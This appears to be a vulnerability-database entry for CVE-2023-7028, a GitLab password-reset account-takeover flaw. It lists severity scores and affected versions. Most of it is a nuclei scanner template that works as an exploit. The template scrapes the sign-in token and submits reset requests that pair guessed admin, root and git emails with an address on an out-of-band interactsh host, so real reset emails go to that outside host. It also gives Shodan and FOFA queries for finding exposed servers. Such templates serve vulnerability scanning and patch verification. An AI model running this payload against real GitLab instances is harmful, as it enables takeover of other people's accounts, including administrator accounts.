GitLab - Account Takeover via Password Reset

2024-01-1407:28:32

ProjectDiscovery

github.com

hackerone

cve2023

gitlab

auth-bypass

intrusive

critical

account-takeover

email-delivery

vulnerability

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

8.5 High

AI Score

Confidence

High

0.96 High

EPSS

Percentile

99.5%

JSON

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.95952
    epss-percentile: 0.99464
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - [email protected]
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 4a0a00473045022100fe706da29f53fa0b108713ef9f95c38b54a7481e7a91e1935b4a61b053972c320220348984153c3fabb194fc8d66770c796b3a32a7ebfd8f0a20d8eaf3b529aa2c84:922c64590222798bb761d5b6d8e72950